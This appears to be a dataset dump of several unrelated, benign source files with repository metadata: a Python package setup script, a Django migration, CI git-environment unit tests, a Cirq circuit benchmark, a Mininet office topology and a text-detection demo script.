'Programming Language :: Python :: 3.8',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
| 33.472727
| 103
| 0.632265
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='tool-registry-client',
version='0.1.0',
packages=setuptools.find_packages(),
entry_points={
},
python_requires='>=3.6.*',
install_requires=[
'click>=7.1.2',
'jsonschema>=3.2.0',
'synapseclient>=2.2.0'
],
description='Tool Registry Library for Python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Sage-Bionetworks/tool-registry-client',
author='The Tool Registry Team',
author_email='thomas.schaffter@sagebionetworks.org',
license='Apache',
    project_urls={
        "Source Code": "https://github.com/Sage-Bionetworks/tool-registry-client",
        "Bug Tracker": "https://github.com/Sage-Bionetworks/tool-registry-client/issues",
    },
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
| true
| true
|
f707bcdaa7a7741b72aedb923c21c3cc3a57b457
| 724
|
py
|
Python
|
mep/accounts/migrations/0019_allow_null_precision.py
|
making-books-ren-today/test_eval_3_shxco
|
5a6427abeb4aec1aa70c0d9a4b32d028012780c8
|
[
"Apache-2.0"
] | 3
|
2020-05-12T19:19:41.000Z
|
2021-04-07T13:56:32.000Z
|
mep/accounts/migrations/0019_allow_null_precision.py
|
making-books-ren-today/test_eval_3_shxco
|
5a6427abeb4aec1aa70c0d9a4b32d028012780c8
|
[
"Apache-2.0"
] | 736
|
2017-06-21T16:24:42.000Z
|
2022-02-26T17:46:10.000Z
|
mep/accounts/migrations/0019_allow_null_precision.py
|
making-books-ren-today/test_eval_3_shxco
|
5a6427abeb4aec1aa70c0d9a4b32d028012780c8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-04-20 18:17
from __future__ import unicode_literals
from django.db import migrations
import mep.accounts.models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0018_merge_20180418_1607'),
]
operations = [
migrations.AlterField(
model_name='borrow',
name='end_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
migrations.AlterField(
model_name='borrow',
name='start_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
]
| 26.814815
| 86
| 0.640884
|
from __future__ import unicode_literals
from django.db import migrations
import mep.accounts.models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0018_merge_20180418_1607'),
]
operations = [
migrations.AlterField(
model_name='borrow',
name='end_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
migrations.AlterField(
model_name='borrow',
name='start_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
]
| true
| true
|
f707bcfbcc2754c7894e88a284b9c8d6dc1beda8
| 2,976
|
py
|
Python
|
packages/python/tests/ci/git_env.py
|
LaudateCorpus1/m
|
57e258ddb1347f8e29673410e12575d203bb19c8
|
[
"MIT"
] | null | null | null |
packages/python/tests/ci/git_env.py
|
LaudateCorpus1/m
|
57e258ddb1347f8e29673410e12575d203bb19c8
|
[
"MIT"
] | null | null | null |
packages/python/tests/ci/git_env.py
|
LaudateCorpus1/m
|
57e258ddb1347f8e29673410e12575d203bb19c8
|
[
"MIT"
] | 1
|
2021-12-31T13:25:33.000Z
|
2021-12-31T13:25:33.000Z
|
from unittest.mock import patch
from m.ci.config import Config, GitFlowConfig, MFlowConfig, Workflow
from m.ci.git_env import GitEnv, get_git_env
from m.core import issue
from m.core.fp import Good
from m.core.io import EnvVars
from ..util import FpTestCase
class GitEnvTest(FpTestCase):
config = Config(
owner='jmlopez-rod',
repo='m',
version='0.0.0',
m_dir='m',
workflow=Workflow.FREE_FLOW,
git_flow=GitFlowConfig(),
m_flow=MFlowConfig(),
)
env_vars = EnvVars(
ci_env=True,
github_token='super_secret_like_damn',
server_url='abc.xyz',
run_id='404',
run_number='1',
run_url='http://abc.xyz/404',
git_branch='refs/heads/master',
git_sha='git-sha-abc-123',
)
def test_local(self):
self.env_vars.ci_env = False
result = get_git_env(self.config, self.env_vars)
self.assert_ok(result)
self.assertDictEqual(
result.value.__dict__,
GitEnv(
sha='git-sha-abc-123',
branch='master',
target_branch='master',
).__dict__,
)
def test_read_git_env_fail(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.return_value = issue('made up issue')
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertIsNotNone(err.cause)
self.assertEqual(err.cause.message, 'made up issue')
def test_bad_github_response(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [Good({}), Good({})]
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertEqual(
err.cause.message,
'`repository` path was not found',
)
def test_pass(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [
Good(
dict(
repository=dict(
commit=dict(
message='Merge sha1 into sha2',
),
),
),
),
Good(
dict(
repository=dict(
commit=dict(
oid='123456789',
message='commit message',
),
),
),
),
]
result = get_git_env(self.config, self.env_vars)
self.assertFalse(result.is_bad)
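# Illustrative sketch (not part of the original tests): the branch string
# normalization test_local asserts, i.e. 'refs/heads/master' -> 'master'.
# This is only the string manipulation the expected GitEnv implies.
_example_branch = 'refs/heads/master'.rsplit('/', 1)[-1]  # == 'master'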
| 32.347826
| 68
| 0.511425
|
from unittest.mock import patch
from m.ci.config import Config, GitFlowConfig, MFlowConfig, Workflow
from m.ci.git_env import GitEnv, get_git_env
from m.core import issue
from m.core.fp import Good
from m.core.io import EnvVars
from ..util import FpTestCase
class GitEnvTest(FpTestCase):
config = Config(
owner='jmlopez-rod',
repo='m',
version='0.0.0',
m_dir='m',
workflow=Workflow.FREE_FLOW,
git_flow=GitFlowConfig(),
m_flow=MFlowConfig(),
)
env_vars = EnvVars(
ci_env=True,
github_token='super_secret_like_damn',
server_url='abc.xyz',
run_id='404',
run_number='1',
run_url='http://abc.xyz/404',
git_branch='refs/heads/master',
git_sha='git-sha-abc-123',
)
def test_local(self):
self.env_vars.ci_env = False
result = get_git_env(self.config, self.env_vars)
self.assert_ok(result)
self.assertDictEqual(
result.value.__dict__,
GitEnv(
sha='git-sha-abc-123',
branch='master',
target_branch='master',
).__dict__,
)
def test_read_git_env_fail(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.return_value = issue('made up issue')
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertIsNotNone(err.cause)
self.assertEqual(err.cause.message, 'made up issue')
def test_bad_github_response(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [Good({}), Good({})]
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertEqual(
err.cause.message,
'`repository` path was not found',
)
def test_pass(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [
Good(
dict(
repository=dict(
commit=dict(
message='Merge sha1 into sha2',
),
),
),
),
Good(
dict(
repository=dict(
commit=dict(
oid='123456789',
message='commit message',
),
),
),
),
]
result = get_git_env(self.config, self.env_vars)
self.assertFalse(result.is_bad)
| true
| true
|
f707bd3e256af4b86d84f1b1920f35618103429e
| 3,025
|
py
|
Python
|
benchmark/startCirq2117.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startCirq2117.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startCirq2117.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=37
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=34
c.append(cirq.Z.on(input_qubit[3])) # number=35
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=36
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=5
c.append(cirq.H.on(input_qubit[1])) # number=6
c.append(cirq.H.on(input_qubit[2])) # number=7
c.append(cirq.H.on(input_qubit[3])) # number=8
c.append(cirq.H.on(input_qubit[3])) # number=31
c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) # number=32
c.append(cirq.H.on(input_qubit[3])) # number=33
c.append(cirq.X.on(input_qubit[3])) # number=27
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) # number=28
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[1])) # number=30
c.append(cirq.CZ.on(input_qubit[2],input_qubit[0])) # number=15
c.append(cirq.H.on(input_qubit[0])) # number=16
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=20
c.append(cirq.X.on(input_qubit[2])) # number=21
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=22
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=17
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=23
c.append(cirq.X.on(input_qubit[2])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=25
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=19
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
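# Illustrative sketch (not part of the original benchmark): bitstring() folds
# one row of measurement results into a histogram key; the bits are made up.
_example_key = bitstring([1, 0, 1, 1])  # == '1011'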
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
    circuit_sample_count = 2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq2117.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
| 36.445783
| 77
| 0.684959
|
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
from cirq.contrib.svg import SVGCircuit
def make_circuit(n: int, input_qubit):
c = cirq.Circuit()
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.H.on(input_qubit[1]))
    c.append(cirq.H.on(input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0]))
    c.append(cirq.Z.on(input_qubit[3]))
    c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[3]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.H.on(input_qubit[1]))
    c.append(cirq.H.on(input_qubit[2]))
    c.append(cirq.H.on(input_qubit[3]))
    c.append(cirq.H.on(input_qubit[3]))
    c.append(cirq.CZ.on(input_qubit[0],input_qubit[3]))
    c.append(cirq.H.on(input_qubit[3]))
    c.append(cirq.X.on(input_qubit[3]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3]))
    c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.H.on(input_qubit[1]))
    c.append(cirq.CZ.on(input_qubit[2],input_qubit[0]))
    c.append(cirq.H.on(input_qubit[0]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.X.on(input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.X.on(input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2]))
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
    circuit_sample_count = 2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq2117.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
| true
| true
|
f707be165739e0087fa738d5095f6a55983e7b80
| 4,453
|
py
|
Python
|
mininet/dopOffice1_topo.py
|
Konstantin-Minachkin/Ryu_SDN_Controller
|
2fd1c3e69b33a8db70ea1eb9303751c1afdaf4e9
|
[
"Apache-2.0"
] | null | null | null |
mininet/dopOffice1_topo.py
|
Konstantin-Minachkin/Ryu_SDN_Controller
|
2fd1c3e69b33a8db70ea1eb9303751c1afdaf4e9
|
[
"Apache-2.0"
] | null | null | null |
mininet/dopOffice1_topo.py
|
Konstantin-Minachkin/Ryu_SDN_Controller
|
2fd1c3e69b33a8db70ea1eb9303751c1afdaf4e9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Region office topology.
Office has two floors
_________terminate_switch_____________________
| | |
switch-1-floor switch-2-floor
| | |
hosts switchF2 hosts
|
hosts
Hosts consist of PCs+phones, ATMs or security devices (cameras, etc.)
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
"Simple topology example."
def __init__( self, hosts_per_sw, hnum, tnum):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
ts1 = self.addSwitch( 's1', dpid='%x' % 41)
s_fl1 = self.addSwitch( 's_fl1', dpid='%x' % 42)
s_fl2 = self.addSwitch( 's_fl2', dpid='%x' % 43)
s_f2_2 = self.addSwitch( 's_f2_2', dpid='%x' % 44)
self.addLink( ts1, s_fl1, 2, 1 )
self.addLink( ts1, s_fl2, 3, 1 )
self.addLink( s_fl2, s_f2_2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s_fl1, 0, 2 )
self.addLink( sec2, s_fl2, 0, 3 )
atm1 = self.addHost( 'atm1', ip='172.16.26.18/28')
atm2 = self.addHost( 'atm2', ip='172.16.26.19/28')
atm3 = self.addHost( 'atm3', ip='172.16.26.20/28')
self.addLink( atm2, s_f2_2, 0, 2 )
self.addLink( atm3, s_f2_2, 0, 3 )
self.addLink( atm1, s_fl1, 0, 3 )
pnum = 4
# Add links halv of hosts to one switch - half to another
for i in range(hosts_per_sw):
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl1, 0, pnum )
self.addLink( t, s_fl1, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl2, 0, pnum )
self.addLink( t, s_fl2, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_f2_2, 0, pnum )
self.addLink( t, s_f2_2, 0, pnum+1 )
hnum+=1
tnum+=1
pnum += 2
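# Illustrative sketch (not part of the original topology): the /26 addressing
# the loops above assume. 'h' hosts live in 172.16.128.128/26 (gateway .129)
# and 't' hosts in 172.16.128.192/26 (gateway .193); the octets below match
# the hnum/tnum values used in runMinimalTopo.
_h_host_octets = range(130, 142)  # hnum 130..141 for the twelve 'h' hosts
_t_host_octets = range(194, 206)  # tnum 194..205 for the twelve 't' hosts
assert all(129 <= o <= 190 for o in _h_host_octets)
assert all(193 <= o <= 254 for o in _t_host_octets)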
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 4
hnum = 130
tnum = 194
topo = MyTopo(num, hnum, tnum) # Create an instance of our topology
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(num):
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('sec1').cmd('ip route add default via 172.16.28.33')
net.get('sec2').cmd('ip route add default via 172.16.28.33')
net.get('atm1').cmd('ip route add default via 172.16.26.17')
net.get('atm2').cmd('ip route add default via 172.16.26.17')
net.get('atm3').cmd('ip route add default via 172.16.26.17')
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
# After the user exits the CLI, shutdown the network.
net.stop()
if __name__ == '__main__':
# This runs if this file is executed directly
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo }
| 35.624
| 75
| 0.534247
|
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
def __init__( self, hosts_per_sw, hnum, tnum):
Topo.__init__( self )
ts1 = self.addSwitch( 's1', dpid='%x' % 41)
s_fl1 = self.addSwitch( 's_fl1', dpid='%x' % 42)
s_fl2 = self.addSwitch( 's_fl2', dpid='%x' % 43)
s_f2_2 = self.addSwitch( 's_f2_2', dpid='%x' % 44)
self.addLink( ts1, s_fl1, 2, 1 )
self.addLink( ts1, s_fl2, 3, 1 )
self.addLink( s_fl2, s_f2_2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s_fl1, 0, 2 )
self.addLink( sec2, s_fl2, 0, 3 )
atm1 = self.addHost( 'atm1', ip='172.16.26.18/28')
atm2 = self.addHost( 'atm2', ip='172.16.26.19/28')
atm3 = self.addHost( 'atm3', ip='172.16.26.20/28')
self.addLink( atm2, s_f2_2, 0, 2 )
self.addLink( atm3, s_f2_2, 0, 3 )
self.addLink( atm1, s_fl1, 0, 3 )
pnum = 4
for i in range(hosts_per_sw):
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl1, 0, pnum )
self.addLink( t, s_fl1, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_fl2, 0, pnum )
self.addLink( t, s_fl2, 0, pnum+1 )
hnum+=1
tnum+=1
h = self.addHost( 'h%s'%hnum, ip='172.16.128.%s/26'%hnum)
t = self.addHost( 't%s'%tnum, ip='172.16.128.%s/26'%tnum)
self.addLink( h, s_f2_2, 0, pnum )
self.addLink( t, s_f2_2, 0, pnum+1 )
hnum+=1
tnum+=1
pnum += 2
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 4
hnum = 130
tnum = 194
topo = MyTopo(num, hnum, tnum)
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(num):
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('h%s'%hnum).cmd('ip route add default via 172.16.128.129')
net.get('t%s'%tnum).cmd('ip route add default via 172.16.128.193')
hnum+=1
tnum+=1
net.get('sec1').cmd('ip route add default via 172.16.28.33')
net.get('sec2').cmd('ip route add default via 172.16.28.33')
net.get('atm1').cmd('ip route add default via 172.16.26.17')
net.get('atm2').cmd('ip route add default via 172.16.26.17')
net.get('atm3').cmd('ip route add default via 172.16.26.17')
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo }
| true
| true
|
f707be9122c5f2ae0d90397f5f92a7c44e559c95
| 3,657
|
py
|
Python
|
demo/icdar2013_detection.py
|
muchwater/TextFuseNet_EfficientNet
|
444ee48a9021f31422ca5a2d13aaffa79a950aa0
|
[
"MIT"
] | 348
|
2020-09-22T10:27:20.000Z
|
2022-03-31T08:17:18.000Z
|
demo/icdar2013_detection.py
|
muchwater/TextFuseNet_EfficientNet
|
444ee48a9021f31422ca5a2d13aaffa79a950aa0
|
[
"MIT"
] | 89
|
2020-09-24T04:31:54.000Z
|
2022-03-31T07:46:22.000Z
|
demo/icdar2013_detection.py
|
muchwater/TextFuseNet_EfficientNet
|
444ee48a9021f31422ca5a2d13aaffa79a950aa0
|
[
"MIT"
] | 102
|
2020-09-24T11:30:07.000Z
|
2022-03-24T12:18:37.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import argparse
import glob
import multiprocessing as mp
import os
import time
import cv2
import tqdm
import numpy as np
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from detectron2.utils.logger import setup_logger
from predictor import VisualizationDemo
# constants
WINDOW_NAME = "COCO detections"
def setup_cfg(args):
# load config from file and command-line arguments
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
# Set model
cfg.MODEL.WEIGHTS = args.weights
# Set score_threshold for builtin models
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold
cfg.freeze()
return cfg
def get_parser():
parser = argparse.ArgumentParser(description="Detectron2 Demo")
parser.add_argument(
"--config-file",
default="./configs/ocr/icdar2013_101_FPN.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--weights",
default="./out_dir_r101/icdar2013_model/model_ic13_r101.pth",
metavar="pth",
help="the model used to inference",
)
parser.add_argument(
"--input",
default="./input_images/*.jpg",
nargs="+",
help="the folder of icdar2013 test images"
)
parser.add_argument(
"--output",
default="./test_icdar2013/",
help="A file or directory to save output visualizations. "
"If not given, will show output in an OpenCV window.",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--opts",
help="Modify config options using the command-line 'KEY VALUE' pairs",
default=[],
nargs=argparse.REMAINDER,
)
return parser
def save_result_to_txt(txt_save_path,prediction,polygons):
file = open(txt_save_path,'w')
classes = prediction['instances'].pred_classes
boxes = prediction['instances'].pred_boxes.tensor
for i in range(len(classes)):
if classes[i]==0:
xmin = str(int(boxes[i][0]))
ymin = str(int(boxes[i][1]))
xmax = str(int(boxes[i][2]))
ymax = str(int(boxes[i][3]))
            # Write one box per line; the format keeps a trailing comma.
            file.write(xmin+','+ymin+','+xmax+','+ymax+',')
            file.write('\r\n')
file.close()
if __name__ == "__main__":
args = get_parser().parse_args()
cfg = setup_cfg(args)
detection_demo = VisualizationDemo(cfg)
    test_images_path = args.input
    output_path = args.output
    # argparse nargs="+" yields a list when --input is passed on the command
    # line, while the default is a single glob string; normalise to a list.
    if isinstance(test_images_path, str):
        test_images_path = [test_images_path]
    start_time_all = time.time()
    img_count = 0
    for i in (p for pattern in test_images_path for p in glob.glob(pattern)):
print(i)
img_name = os.path.basename(i)
img_save_path = output_path + img_name.split('.')[0] + '.jpg'
img = cv2.imread(i)
start_time = time.time()
prediction, vis_output, polygons = detection_demo.run_on_image(img)
        # ICDAR-style result file name: res_img<N>.txt.
        txt_save_path = output_path + 'res_img' + img_name.split('.')[0].split('img')[1] + '.txt'
save_result_to_txt(txt_save_path,prediction,polygons)
print("Time: {:.2f} s / img".format(time.time() - start_time))
vis_output.save(img_save_path)
img_count += 1
print("Average Time: {:.2f} s /img".format((time.time() - start_time_all) / img_count))
| 28.348837
| 97
| 0.649166
|
import argparse
import glob
import multiprocessing as mp
import os
import time
import cv2
import tqdm
import numpy as np
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from detectron2.utils.logger import setup_logger
from predictor import VisualizationDemo
WINDOW_NAME = "COCO detections"
def setup_cfg(args):
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.MODEL.WEIGHTS = args.weights
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = args.confidence_threshold
cfg.freeze()
return cfg
def get_parser():
parser = argparse.ArgumentParser(description="Detectron2 Demo")
parser.add_argument(
"--config-file",
default="./configs/ocr/icdar2013_101_FPN.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--weights",
default="./out_dir_r101/icdar2013_model/model_ic13_r101.pth",
metavar="pth",
help="the model used to inference",
)
parser.add_argument(
"--input",
default="./input_images/*.jpg",
nargs="+",
help="the folder of icdar2013 test images"
)
parser.add_argument(
"--output",
default="./test_icdar2013/",
help="A file or directory to save output visualizations. "
"If not given, will show output in an OpenCV window.",
)
parser.add_argument(
"--confidence-threshold",
type=float,
default=0.7,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--opts",
help="Modify config options using the command-line 'KEY VALUE' pairs",
default=[],
nargs=argparse.REMAINDER,
)
return parser
def save_result_to_txt(txt_save_path,prediction,polygons):
file = open(txt_save_path,'w')
classes = prediction['instances'].pred_classes
boxes = prediction['instances'].pred_boxes.tensor
for i in range(len(classes)):
if classes[i]==0:
xmin = str(int(boxes[i][0]))
ymin = str(int(boxes[i][1]))
xmax = str(int(boxes[i][2]))
ymax = str(int(boxes[i][3]))
            file.write(xmin+','+ymin+','+xmax+','+ymax+',')
            file.write('\r\n')
file.close()
if __name__ == "__main__":
args = get_parser().parse_args()
cfg = setup_cfg(args)
detection_demo = VisualizationDemo(cfg)
    test_images_path = args.input
    output_path = args.output
    if isinstance(test_images_path, str):
        test_images_path = [test_images_path]
    start_time_all = time.time()
    img_count = 0
    for i in (p for pattern in test_images_path for p in glob.glob(pattern)):
print(i)
img_name = os.path.basename(i)
img_save_path = output_path + img_name.split('.')[0] + '.jpg'
img = cv2.imread(i)
start_time = time.time()
prediction, vis_output, polygons = detection_demo.run_on_image(img)
txt_save_path = output_path + 'res_img' + img_name.split('.')[0].split('img')[1] + '.txt'
save_result_to_txt(txt_save_path,prediction,polygons)
print("Time: {:.2f} s / img".format(time.time() - start_time))
vis_output.save(img_save_path)
img_count += 1
print("Average Time: {:.2f} s /img".format((time.time() - start_time_all) / img_count))
| true
| true
|
f707bf07c1bddf492074314149653fdbdd798735
| 495
|
py
|
Python
|
stx/utils/stack.py
|
bakasoft/stx
|
ef6ad209c2acaed83df37f8ebbec52ffc0ff1909
|
[
"MIT"
] | 1
|
2020-04-07T04:42:11.000Z
|
2020-04-07T04:42:11.000Z
|
stx/utils/stack.py
|
stx-lang/python-stx
|
ef6ad209c2acaed83df37f8ebbec52ffc0ff1909
|
[
"MIT"
] | 6
|
2020-03-21T20:16:07.000Z
|
2020-04-10T02:53:38.000Z
|
stx/utils/stack.py
|
stx-lang/python-stx
|
ef6ad209c2acaed83df37f8ebbec52ffc0ff1909
|
[
"MIT"
